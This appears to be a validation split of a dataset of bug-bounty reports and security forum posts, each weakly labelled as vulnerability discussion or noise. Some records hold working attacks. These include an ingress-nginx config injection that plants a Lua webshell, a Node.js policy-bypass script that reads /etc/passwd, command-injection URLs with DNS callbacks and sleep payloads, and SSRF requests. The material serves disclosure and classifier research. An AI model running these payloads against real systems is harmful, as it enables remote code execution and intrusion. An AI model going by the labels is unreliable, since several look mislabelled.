Reproduce\n1. Open browser\n 2. Hit endpoint */jira/secure/QueryComponent!Default.jspa* in the target\n 3. Observe the results.\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2020-14179"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a94a09380f23546c46d1", "text": "First of all the module does not teach you extensively more about it. You have to research a little. this lesson is to teach you about subdomain or subdirectory in a website. so you can use gobuster also. Another thing to note is dont add -fs first. What -fs does is it select the common size of all the namelist you use on ffuf. so if you see common size in namelist in ffuf its gonna be some number(status, size, words, lines, duration) you will see all. But -fs is for size which means it is to get common size. I am writing this for myself and others so its gonna be easy for them. Dont look for answer rightaway.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "66cc483f12ca18c15179", "text": "Hi, I am on the skills assessment and am quite stuck from the start… I am attempting to brute force support login, with a 30 sec dely between each req to prevent the lockout and trying to decode the cookie but I am stuck on that as well. any hints? happy to talk over dm’s or discord. Thanks!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-07-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8557532b1518fd5e8ff5", "text": "[Server-Side Request Forgery (SSRF)] Unauthenticated SSRF in 3rd party module \"cerdic/csstidy\"\n\n## Summary:\nThe mail extension in nextcloud includes a module called \"cerdic/csstidy\" which basically ships with a publicly accessible test/example interface to play with the CSS formatter and optimiser (/apps/mail/vendor/cerdic/css-tidy/css_optimiser.php). This module allows contacting any remote server via http, which makes it vulnerable to SSRF. We've tried reaching out to the csstidy developers directly but couldn't reach them yet, so we're reaching out to you so they can fix this before csstidy pushes out a fix.\n\nIt's also possible to download remote data as a CSS file into a temporary directory in /apps/mail/vendor/cerdic/css-tidy/temp/. At the moment, this doesn't look to be exploitable on its own, and probably requires another vulnerability to exploit, e.g. a Local File Inclusion vulnerability could be turned into a Remote File Inclusion by first creating a CSS file containing PHP code (downloaded from a remote server via the csstidy vulnerability), and then including the local file via the LFI bug.\n\n## Steps To Reproduce:\n\n 1. Install the mail extension\n 2. Visit: http://example.com/apps/mail/vendor/cerdic/css-tidy/css_optimiser.php (no authentication is required)\n 3. Either use the interface to set \"CSS from URL\" on the bottom or set the \"url\" parameter manually, for example: http://example.com/apps/mail/vendor/cerdic/css-tidy/css_optimiser.php?url=http://localhost/test\n 4. To download remote data as CSS file, either use the interface or try this: http://example.com/apps/mail/vendor/cerdic/css-tidy/css_optimiser.php?url=http://localhost/apps/richdocuments/docs/custom.css&custom=1&template=4\n\n## Supporting Material/References:\n\n* Problematic line in csstidy: https://github.com/Cerdic/CSSTidy/blob/master/css_optimiser.php#L376\n\n## Impact\n\nUsually, SSRFs are not considered a high-impact vulnerability, and I would likely agree on most PHP projects, but (a) this vulnerability can be exploited by an unauthenticated attacker and (b) nextcloud is also designed to be used at a home network which opens the possibility of not only attacking other local services, but also the router of the home network. The ability to receive and write CSS files can also be used by the attacker to find out what other services are running on devices in the network or what kind of router is used etc., before running additional attacks.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6946b320434ab259ff00", "text": "[OS Command Injection] OS command injection on seedr.ru\n\nsite: https://seedr.ru\n\nThe seed_id parameter be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed. The payload was submitted in the seed_id parameter. The application performed a DNS lookup for the specified domain name. Additionally, the payload was submitted in the seed_id parameter. The application took 20064 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected command caused a time delay. \nI also got access to the /api/v1/a/group/all/ folder, which contains information about groups.\n\nDefault request:\nhttps://api.seedr.ru/uploads/521b62f5b7132de722027388%7Cnslookup%20-q=cname%200vwm3493ytajvrc4a2g7ptfmgdm7a04o0crzhn6.burpcollaborator.net.&.zip\n\nSleep request:\nhttps://api.seedr.ru/uploads/521b62f5b7132de722027388%7Cping%20-n%2021%20127.0.0.1%7C%7C%60ping%20-c%2021%20127.0.0.1%60%20#'%20|ping%20-n%2021%20127.0.0.1||%60ping%20-c%2021%20127.0.0.1%60%20#\\%22%20|ping%20-n%2021%20127.0.0.1.zip\n\nIssue remediation\nIf possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.\n\n## Impact\n\nOS command injection is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d8910332a555ab0c942f", "text": "[Privilege Escalation] Dependency Policy Bypass via process.binding\n\n# Preface (for the Internet Bug Bounty)\n\nThe entire vulnerability can be found in HackerOne @ [Dependency Policy Bypass via process.binding](https://hackerone.com/reports/1946470#activity-21276452). For the sake of convenience, I've pasted the entire report down below.\n\n# Copied Vulnerability\n\n**Summary:** By taking advantage of `process.binding('spawn_sync');`, a malicious actor can run arbitrary code, outside of the limits defined in a `policy.json` file.\n\n**Description:** The experimental policy feature for NodeJS is used usually for security reasons, including validating integrity of source code and limiting module access to files. This vulnerability allows an actor to bypass the latter part of its security features, by loading in any module from an external Node.JS script.\n\nSince the required modules use internal bindings, by fetching these bindings themselves, it is possible to neglect the dependency policy altogether.\n\nThis also exists within almost all `process.binding` modules with less or the same severity.\n\n## Steps To Reproduce:\n\n1. Create `policy.json`:\n```json\n{\n \"onerror\": \"exit\",\n \"scopes\": {\n \"file:\": {\n \"integrity\": true,\n \"dependencies\": {}\n }\n }\n}\n```\n\n2. Create `app.js`:\n```js\nconst { spawn } = process.binding(\"spawn_sync\");\n\nfunction arbitraryExecute(input) {\n const result = spawn({\n maxBuffer: 1048576,\n args: [\"node\", \"-\"],\n cwd: undefined,\n detached: false,\n file: \"node\",\n windowsHide: false,\n windowsVerbatimArguments: false,\n killSignal: undefined,\n stdio: [\n { type: \"pipe\", readable: true, writable: false, input: Buffer.from(input) },\n { type: \"pipe\", readable: false, writable: true },\n { type: \"pipe\", readable: false, writable: true },\n ],\n });\n\n return {\n output: result.output[1].toString(),\n error: result.output[2].toString(),\n }\n}\n\nconsole.log(arbitraryExecute(`\nconst fs = require('fs');\n\nfs.readFile('/etc/passwd', 'utf8', (err, data) => {\n if (err) {\n console.error(err);\n return;\n }\n console.log(data);\n});\n`).output);\n```\n\n3. Run the code with:\n```sh\nnode --experimental-policy=policy.json app.js\n```\n\nThe file will work as the code describes, even though the permission policy explicitly states it doesn't take any dependencies.\n\nIf you run the file alone with the same policy:\n\n`app.js`:\n```js\nconst fs = require('fs');\n\nfs.readFile('/etc/passwd', 'utf8', (err, data) => {\n if (err) {\n console.error(err);\n return;\n }\n console.log(data);\n});\n```\n\nIt will show an error:\n```\nerror [ERR_MANIFEST_DEPENDENCY_MISSING]: Manifest resource ./app.js does not list fs as a dependency specifier for conditions: require, node, node-addons\n```\n\n## Impact\n\nAny project using NodeJS's policies in order to restrict dependency use is vulnerable. This example simply reads from `/etc/passwd`, but an attacker can run any arbitrary NodeJS process and script.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "020799c7033d96cdc58a", "text": "[Information Disclosure] Critical sensitive information Disclosure. [HtUS]\n\n(Database user,Database password,Database name) \non https://██████.edu/\n\nI got sensitive information:\nview-source:https://██████████.edu/database.php.orig\n\n\nDatabase information (Database user,Database password,Database name)\n$hostname = '████████.edu';\n$db = '█████████';\n$username = '█��██_user';\n$password = '████';\n\n## Impact\n\nBug impact:\nSensitive information disclosed and possible for an attacker can access into the system.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "079fe881aef67d905288", "text": "$ netstat -ln4 | grep LISTEN | grep -v 127 | wc -l for other confused learners like me: netstat -ln4 - services that are listening, with numeric addresses, and using the ipv4 protocol as opposed to ipv6 or unspecified grep LISTEN - find results containing the word “LISTEN” grep -v 127 - exclude any results that contain the number “127” wc -l - count the number of lines", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "db3dec1006a5258f0c05", "text": "[Server-Side Request Forgery (SSRF)] SSRF Vulnerability through Connection test feature\n\nAn SSRF (Server-Side Request Forgery) attack can potentially be executed through the connection test feature, specifically when interacting with the Slack API. This attack allows an attacker to see the plain response, providing them with information that can aid in exploiting the vulnerability, rather than relying solely on blind SSRF techniques.\n\n## Impact\n\nThis vulnerability allows the user to access connection information and exploit the test connection feature by sending many requests, leading to a denial of service (DoS) condition on the server. Furthermore, malicious actors can leverage this vulnerability to establish harmful connections with the server, hit on metadata endpoints.\n\n{F2635041}", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "74d0b832c96f148419f7", "text": "With some tips I managed to get this question after some hard thinking! If anyone needs a nudge in the right direction feel free to DM me", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-02-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a3dc38929ce9d6f84679", "text": "[Server-Side Request Forgery (SSRF)] Mail app - Blind SSRF via Sierve server fonctionnality and sieveHost parameter\n\nHi everyone,\nI would like to report another Blind SSRF vulnerability through the Nextcloud Mail application.\n\nTested on latest Mail release : `2.0.1`\n\n## Steps To Reproduce:\n\nFirstly, this report is similar to #1736390 except that it touches a new parameter and a different endpoint.\n\nWhen adding a filter via a sieve filter server (`mail` application => added mailbox => settings => Sieve filter server), the following request is made : \n\n```\nPUT /apps/mail/api/sieve/account/5 HTTP/2\nHost: redacted\nCookie: redactedr\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0\nAccept: application/json, text/plain, */*\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nRequesttoken: redacted\nContent-Length: 117\nOrigin: redacted\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\n\n{\"sieveEnabled\":true,\"sieveHost\":\"evil.org\",\"sievePort\":\"80\",\"sieveUser\":\"\",\"sievePassword\":\"\",\"sieveSslMode\":\"none\"}\n```\n\nThe SSRF is found in the `sieveHost` parameter, and provided that the `sieveSslMode` parameter is set to `none`.\n\n```\n{\"sieveEnabled\":true,\"sieveHost\":\"127.0.0.1\",\"sievePort\":\"80\",\"sieveUser\":\"\",\"sievePassword\":\"\",\"sieveSslMode\":\"none\"}\n```\n\nVia the Burp Intruder tool, I will guess the open ports on my Nextcloud server. Response time less than 100ms => closed port. Response time higher than 5000ms = open ports and service listening on them.\n\n{F1992720}\n\nResult from Burp Intruder on my NC server : \n\n{F1992724}\n\n```\nPort 80 - Apache2 service\nPort 443 - Apache2 service\nPort 2222 - SSH ! (critical)\nPort 6060 - CrowdSec\nPort 8080 - CrowdSec\nPort 3306 - MySQL\nPort 5432 - PostgreSQL\nPort 6379 - My Redis instance for Nextcloud\n```\n\n## Impact\n\nFrom [OWASP](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/):\n\n> SSRF flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL. It allows an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall, VPN, or another type of network access control list (ACL).\n\nThis vulnerability can allow a malicious individual to map the server and the company's internal network via Nextcloud. This is not demonstrated here in the report but one can scan private subnet ranges to try to guess : \n\n- Which IP addresses are responding\n- Wich ports are open \n- Tried to exploit vulnerable services through this Blind SSRF\n\nHere are some examples of Blind SSRF, which were used as a rebound, to exploit more critical vulnerabilities :\n\n[Here](https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html) is an example of how to use an SSRF blind, as a rebound, to exploit a critical flaw.\n\nLooking forward to exchanging.\n\nRegards,\nSupr4s", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dcbf3650fd195b8e187a", "text": "[Cross-site Scripting (XSS) - Stored] Self-XSS on Suggest Tag dialog box\n\n## Summary:\nStored cross-site scripting arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way.\n\nvulnerable URL : https://www.xvideos.com/video57921571/friend_b._if_d.\n\nVulnerability Description : Application have a add tag functionality when i put java script like after that stored XSS vulnerability arise.\n\nStep to Reproduce : \nStep 1 : Go to following URL https://www.xvideos.com/video53284603/b.\nNote : you don't need an account to do this\nStep 2 : There is a add tag functionality insert the following information : \nStep 3 : Click the add button \nStep 4 : you will see a java script popup box showing your domain\n\nCheck the attached Video POC to see the actual XSS vulnerability\n\n## Impact\n\nIf an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.\nWhen the victim accesses the page containing the JavaScript payload, their browser will make a HTTP request to the attacker’s server", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9e305dbf8e64b30cb0b4", "text": "[Insufficiently Protected Credentials] mysql credentials exposed on - https://cz.acronis.com/docker-compose.yml\n\nHi, there are some MySQL credentials exposed on https://cz.acronis.com/docker-compose.yml\nIt is not that you are gonna avoid a compromise with that user/password pair, but just in case you don't wanna make it even easier publishing the credentials to the wild x]\n\n## Impact\n\nMySQL credentials exposed publicly", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3159cfa0b9c72db6a6e3", "text": "It’s one of those assignments that takes a couple of tries. I wasn’t sure how the php code in the module example was creating the hashes, so i got to an online php sandbox an experimented with a couple of lines of codes to figure it out. After having some ideas, modified the module’s python script to compute the hashes for the htbuser user and compared it with the one generated in the question page. Once i got a hit, it confirmed the way it was computing the hashes. Modified the script it to htbadmin user, got it running and pressed the button to generate the token again. Then it was just a matter of waiting.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-12-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "96e0e2be46b27f73980b", "text": "OpenVas Installation\n\nHi, I am using parrot os version 5.0 (Electro Ara) 64-bit and I am facing problems using preinstalled openvas.When I run gvm-check-setup it shows following error gvm-check-setup 21.4.3 Test completeness and readiness of GVM-21.4.3 Step 1: Checking OpenVAS (Scanner)… ERROR: No OpenVAS Scanner found. FIX: Please install OpenVAS Scanner. ERROR: Your GVM-21.4.3 installation is not yet complete! Please follow the instructions marked with FIX above and run this script again. Could someone help me fix this error.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-06-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0beee6fe0ac87f31311e", "text": "[Insecure Direct Object Reference (IDOR)] Email Address Exposure via Gratipay Migration Tool\n\nThrough the `/migrate` route, an attacker can input the username of any user on the site and retrieve their primary email address without any authorization required.\n\n# Steps to reproduce:\n\n#### Note: This cannot be performed with `hackerone-target`, because that account seems to return a `None` as an email.\n1. Craft and post an HTTP request that fakes step 1 of the migration process through Gratipay, with any email in the `email_address` field and the target's username in the `username` field.\n```http\nPOST /migrate?step=2 HTTP/1.1\nHost: liberapay.com\nCookie: XXXXXXX\nX-CSRF-TOKEN: XXXXXXX\nContent-Type: application/x-www-form-urlencoded\n\nemail_address=suprnova+gratipay@wearehackerone.com&username=suprnova\n```\n2. Examine the HTML of the response.\n```html\n\n \n \n \n
The username 'Suprnova' is already taken.
\n

Does this existing account belong to you?

\n

\n \n \n

\n\n```\nThe `value` field for `log-in.id` has been automatically populated with the primary email address of the target.\n\n# Vulnerable Code\nThe problematic code can be found in the file [www/migrate.spt:349](https://github.com/liberapay/liberapay.com/blob/1f1a4b605def37aa9bed55586c7425a819c3fcdf/www/migrate.spt#L349).\n```html\n

\n \n \n

\n```\nThe website automatically displays the email address of the existing account, despite the current user's lack of authorization to view that information.\n\n# Mitigation:\nTo mitigate this exposure, the value for \"log-in.id\" could instead refer to the ID number of the account being referred to.\n\n## Impact\n\nA malicious attacker could simply identify any user on the site and instantly access their email address from the database to be used elsewhere, regardless of the victim's privacy settings.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "11e5c0a57b91d41af5af", "text": "[Privilege Escalation] Privilege Escalation - \"Analyst\" Role Can View Email Domains of a Company - [GET /voyager/api/voyagerOrganizationDashEmailDomainMappings]\n\n## Summary:\nHey team,\nDuring the security assessment, I came across an endpoint - `GET /voyager/api/voyagerOrganizationDashEmailDomainMappings`, which is vulnerable to **privilege escalation**. A lower privileged user can abuse this to view the list of approved domains for email verification even though it can't be accessed directly from the UI.\n\n## Vulnerable HTTP Request:\n```\nGET /voyager/api/voyagerOrganizationDashEmailDomainMappings?decorationId=com.linkedin.voyager.dash.deco.organization.FullOrganizationEmailDomainMapping-2&company=urn%3Ali%3Afsd_company%3A81541206&count=100&q=organization&start=0 HTTP/2\nHost: www.linkedin.com\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0\nAccept: application/vnd.linkedin.normalized+json+2.1\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Restli-Protocol-Version: 2.0.0\nDnt: 1\nReferer: https://www.linkedin.com/company/81541206/admin/manage-admins/\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nCookie: REDACTED\nCsrf-Token: REDACTED\n```\n## Steps to Reproduce:\n* Go to https://www.linkedin.com/ and log in to your test account.\n* Go to **\"Me\"** and click on your company under the **\"Manage\"** section.\n\n{F1732479}\n* Go to **\"Admin Tools\"** > **\"Employee Verification\"**\n\n{F1732480}\n* Intercept the vulnerable HTTP request.\n* Change all the values of the cookie parameters & CSRF token to that of a lower privileged user (**\"Analyst\"** role). The response will disclose the approved domain for verification.\n\n{F1732484}\n\n# PoC:\n* Have a look at the video here:\n\n{F1732486}\n\n## Impact\n\nA lower privileged user can abuse this to view the list of approved domains for email verification even though it can't be accessed directly from the UI.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2b842b1627c8a4cfb9b3", "text": "[Improper Input Validation] Bypass parsing of transaction data, users on the phishing site will transfer/approve ERC20 tokens without being alerted\n\n## Summary:\nThere are still a lot of valuable erc20 tokens compiled with solc < 0.5.0 on the eth mainnet. The methods compiled with Solc below 0.5.0 will not check if the length of the input calldata matches the params types. It will load the calldata as long as the params types need, regardless of the actual input length. And the insufficient parts will be read as byte(00). \n\nMetamask can't parse these unusual length transaction data like normal. For example, delete the last byte of the input data:\n\nA normal transfer call data:\n```\nsighash -> 0xa9059cbb\naddress to -> 000000000000000000000000C588e338FdBB2CC523a1177f3D18e87FF5A16a6b\nuint256 value -> 0000000000000000000000000000000000000000000000000000000000989700 -> 10000128\n```\nEvil call data:\n```\nsighash -> 0xa9059cbb\naddress to -> 000000000000000000000000C588e338FdBB2CC523a1177f3D18e87FF5A16a6b\nuint256 value -> 00000000000000000000000000000000000000000000000000000000009897 \n```\n\nWhen users connect to a phishing site, attack can trigger a token transfer or approve transaction without alerting users to the token amount. \n\n## Steps To Reproduce:\n\nI fork the metamask test dapp repo as a exp demo. {F1840812}\n\n1. cd in the dist, and setup a http server, for example run `static-server . -z --port 9011`.\n2. open in the browser and connect with metamask ext at the Rinkeby network.\n3. Click the button `Create Token` will deploy a erc20 token with compiler solc 0.4.26. \ncontract source code: {F1840809}\n\n{F1840801}\n\n4. After contract deploying, click `Transfer Tokens`, metamask will show its a normal contract call without showing send to address, send amount and token symbol.\n\n{F1840802}\n\ntransfer send data hex:\n\n{F1840803}\n\nTransfer event log:\n\n{F1840800}\n\n5. Click `Approve Tokens`, lack of prompt like transfer.\n\n{F1840799}\n\n## Impact\n\nThe attacker can induce the victims to send/approve any number of tokens without knowing it.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3a74c9717274a687ccbf", "text": "[Information Disclosure] Possibility of Deface through translation tool - www.mozilla.com\n\nHello team, how are you?\n\nI hope you are well.\n\nI am reporting the vulnerability as this is not a generic bug. And since the vulnerability has already been identified, I thought it important to let the Mozilla Team know.\nAs it says in the scope of the program, if a Mozilla site uses the third party application, the bug could be reported. So in this bug I preferred to report.\n\n# Disclosure of Secrets for a Publicly Accessible Asset\n\n## Overview of the Vulnerability\n\nIn the midst of a search, I found a credential of a third-party associated with Mozilla leaked on the internet. This credential gives access to [https://dashboard.smartling.com/](https://dashboard.smartling.com/).\nAlthough the application is an external tool, this application is responsible for managing all translations of the Mozilla website and other *.Mozilla.com applications.\nIt manages jobs for translations, contains internal Mozilla documents, and has a tool to change any translation performed.\nThe account associated with this credential has access to some Mozilla projects.\n\n```\nAPI Tests\nApp Store Content\nBlog Posts\nEmails\nFiles\nIn-app messages (push notifications, etc.)\nMozilla.org Site\nSL Test Project\nSUMO Articles\nSurveys\n```\n\n# PoC\n\n* Jobs\n\n{F2474698}\n\n* Issues\n\n███████\n\n███████\n\n█████\n\n████\n\n* Translating jobs\n\n███████\n\n* Editing\n\n███████\n\n* Files\n\n██████████\n\n█████\n\n█████████\n\nThese leaks can be found on sites like [https://cyberintelligence.house](https://cyberintelligence.house), [https://dehashed.com/](https://dehashed.com/), and [https://intelx.io/](https://intelx.io/).\nAll the valid data I found are those inserted in the report.\n\n**Steps to Reproduce:**\n1. Use the following credentials to login to the application:\n\n```\nemail: ████████\npassword: ████\n```\n\n\n**Note:**\nI did not make any changes to the accessed application, and I did not copy any information. All accesses shown are for demonstrating proof of concept and impact only.\n\nIt is strongly advised that all the disclosed passwords be changed immediately, and an investigation be undertaken to determine how this leak occurred to prevent future occurrences.\n\nIf you need my IP, it is: ██████\n\nBest regards,\nAstrounder\n\n## Impact\n\nA malicious agent with access to this application can change translations of www.mozilla.com, create translation jobs, gain access to internal Mozilla documents, and other related access.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9fcd5acb74d21813db07", "text": "There are various security settings on a DNS server. Among other things, you can specify whether a zone transfer should be allowed for all servers or only for certain servers (allow-transfer). If a zone transfer is allowed, you can transfer the zone with “dig axfr”. If the zone transfer is not allowed, you have to bruteforce the zone. Hint: Start with the smallest list.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "79d4f2aacd17e603a08a", "text": "[Code Injection] RCE on ingress-nginx-controller via Ingress spec.rules.http.paths.path field\n\nReport Submission Form\n\n## Summary:\n\nA user with ingress create/update privilege may inject config into `nginx.conf` with `path`.\nConfig the log_format and access_log to write arbitrary file.\nInclude the file we created to bypass `path` sanitizer to RCE.\n\n## Kubernetes Version:\n\n```\nserverVersion:\n buildDate: \"2022-03-06T21:32:53Z\"\n compiler: gc\n gitCommit: e6c093d87ea4cbb530a7b2ae91e54c0842d8308a\n gitTreeState: clean\n gitVersion: v1.23.4\n goVersion: go1.17.7\n major: \"1\"\n minor: \"23\"\n platform: linux/amd64\n```\n\n## Component Version:\n\n```\n-------------------------------------------------------------------------------\nNGINX Ingress controller\n Release: v1.2.1\n Build: 08848d69e0c83992c89da18e70ea708752f21d7a\n Repository: https://github.com/kubernetes/ingress-nginx\n nginx version: nginx/1.19.10\n\n-------------------------------------------------------------------------------\n```\n\n## Steps To Reproduce:\n\n 1. Create a kind cluster config\n\nlab.yaml\n```yaml\nkind: Cluster\nname: lab\napiVersion: kind.x-k8s.io/v1alpha4\nnodes:\n# the control plane node config\n- role: control-plane\n kubeadmConfigPatches:\n - |\n kind: InitConfiguration\n nodeRegistration:\n kubeletExtraArgs:\n node-labels: \"ingress-ready=true\"\n extraPortMappings:\n - containerPort: 80\n hostPort: 80\n protocol: TCP\n - containerPort: 443\n hostPort: 443\n protocol: TCP\n# the three workers\n- role: worker\n- role: worker\n- role: worker\n```\n\n 2. Create a testing cluster with the previous config\n\n```bash\nkind create cluster --config lab.yaml\n```\n\n 3. Install nginx-ingress-controller\n\n```bash\nkubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/main/deploy/static/provider/kind/deploy.yaml\n```\n\n 4. Create a the first malicious ingress\n\n**This ingress will allow attacker to write arbitrary content to arbitrary file.**\n(note that the service `not-exist-service` does not need to exist)\n\nwrite_ingress.yaml\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: webexp\nspec:\n rules:\n - host: \"example.com\"\n http:\n paths:\n - path: \"/x/ {\\n\n }\\n\n }\\n\n log_format exploit escape=none $http_x_ginoah;\\n\n server {\\n\n server_name x.x;\\n\n listen 80;\\n\n listen [::]:80;\\n\n location /z/ {\\n\n access_log /tmp/luashell exploit;\\n\n }\\n\n location /x/ {\\n\n #\"\n pathType: Exact\n backend:\n service:\n name: not-exist-service\n port:\n number: 8080\n```\n\nApply the first malicious ingress config\n```bash\nkubectl apply -f write_ingress.yaml\n```\n\n 5. Write a malicious lua config to `/tmp/luashell`\n\nNote that in other cluster config, the `localhost` may need to change to ingress-controller's ip.\n```bash\ncurl localhost/z/ -H \"host: x.x\" -H 'x-ginoah: content_by_lua_block {ngx.req.read_body();local post_args = ngx.req.get_post_args();local cmd = post_args[\"cmd\"];if cmd then f_ret = io.popen(cmd);local ret = f_ret:read(\"*a\");ngx.say(string.format(\"%s\", ret));end;}'\n```\n\n 6. Create a the second malicious ingress\n\n**This ingress will include the malicious lua config, which allow attack to execute arbitrary command.**\n\nwebshell_ingress.yaml\n```yaml\napiVersion: networking.k8s.io/v1\nkind: Ingress\nmetadata:\n name: webexp\nspec:\n rules:\n - host: \"example.com\"\n http:\n paths:\n - path: \"/x/ {\\n\n }\\n\n }\\n\n log_format exploit escape=none $http_x_ginoah;\\n\n server {\\n\n server_name x.x;\\n\n listen 80;\\n\n listen [::]:80;\\n\n location /z/ {\\n\n include /tmp/luashell;\\n\n }\\n\n location /x/ {\\n\n #\"\n pathType: Exact\n backend:\n service:\n name: not-exist-service\n port:\n number: 8080\n```\n\n", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b66f4bda01fd0f9f58dc", "text": "When u complete the first skills, the website brute forcing u get a welcome page saying welcome harry potter and what his password requirements are. The seconds skills assessment follows on from that.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dda1074e689253bdb7c1", "text": "[Uncontrolled Resource Consumption] CVE-2018-6389 exploitation - using scripts loader\n\nHi Fastly Team !\n\nUnauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.\nThe vulnerability is registered as CVE-2018-6389.\nWordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks.\n\n**References**\n\nThe vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389 \nhttps://hackerone.com/reports/925425\nhttps://hackerone.com/reports/335177\nhttps://hackerone.com/reports/753491\n\n**Platform(s) Affected: [website]** 